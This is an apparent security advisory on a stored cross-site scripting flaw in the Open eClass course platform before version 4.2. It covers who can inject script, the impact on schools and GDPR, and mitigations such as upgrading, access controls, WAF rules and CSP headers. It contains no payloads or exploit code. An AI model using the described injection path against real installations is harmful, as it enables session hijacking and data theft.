CVE-2026-24671 is a stored Cross-Site Scripting (XSS) vulnerability identified in the Open eClass platform, a widely used course management system, formerly known as GUnet eClass. The vulnerability affects all versions prior to 4.2 and stems from improper neutralization of input during web page generation (CWE-79). Specifically, authenticated users with high privileges—teachers or administrators—can inject malicious JavaScript code into multiple input fields that are stored and later rendered in the application without proper sanitization or encoding. When other users, such as students or staff, access these compromised pages, the injected scripts execute in their browsers. This can lead to session hijacking, unauthorized actions performed on behalf of users, theft of sensitive information, or manipulation of displayed content. The vulnerability requires the attacker to have authenticated access with elevated privileges, and user interaction is necessary to trigger the malicious payload. The CVSS v3.1 base score is 6.1, reflecting a medium severity with network attack vector, low attack complexity, high privileges required, and user interaction needed. No known exploits have been reported in the wild to date. The vendor addressed this issue in Open eClass version 4.2 by implementing proper input validation and output encoding to neutralize malicious scripts. Given the platform's use in educational institutions, the vulnerability poses a risk to the confidentiality and integrity of user data and the trustworthiness of the learning environment.

For European organizations, particularly educational institutions using Open eClass, this vulnerability can lead to significant risks including unauthorized access to user sessions, data theft, and manipulation of course content or user interactions. The compromise of student or staff accounts could result in exposure of personal data, disruption of educational activities, and erosion of trust in digital learning platforms. Since the vulnerability requires high-privileged authenticated users to inject malicious code, insider threats or compromised administrator accounts pose the greatest risk. The execution of malicious scripts in users' browsers can also facilitate further attacks such as phishing or malware delivery. The impact extends to regulatory compliance, as data breaches involving personal information could violate GDPR requirements, leading to legal and financial consequences. The absence of known exploits reduces immediate risk but does not eliminate the threat, especially in environments where older versions remain in use. Therefore, European educational organizations must consider this vulnerability a medium-level threat that could affect confidentiality and integrity if exploited.

To mitigate CVE-2026-24671, European organizations should immediately upgrade Open eClass installations to version 4.2 or later, where the vulnerability is patched. In environments where immediate upgrade is not feasible, implement strict access controls to limit high-privileged user accounts and monitor their activities for suspicious behavior. Employ web application firewalls (WAFs) with rules designed to detect and block malicious script injections targeting known vulnerable input fields. Conduct regular security audits and code reviews to ensure input validation and output encoding are properly enforced. Educate administrators and teachers about the risks of injecting untrusted content and enforce policies to prevent misuse of input fields. Additionally, enable Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in users' browsers. Finally, monitor logs for unusual patterns indicative of attempted XSS exploitation and respond promptly to any detected incidents.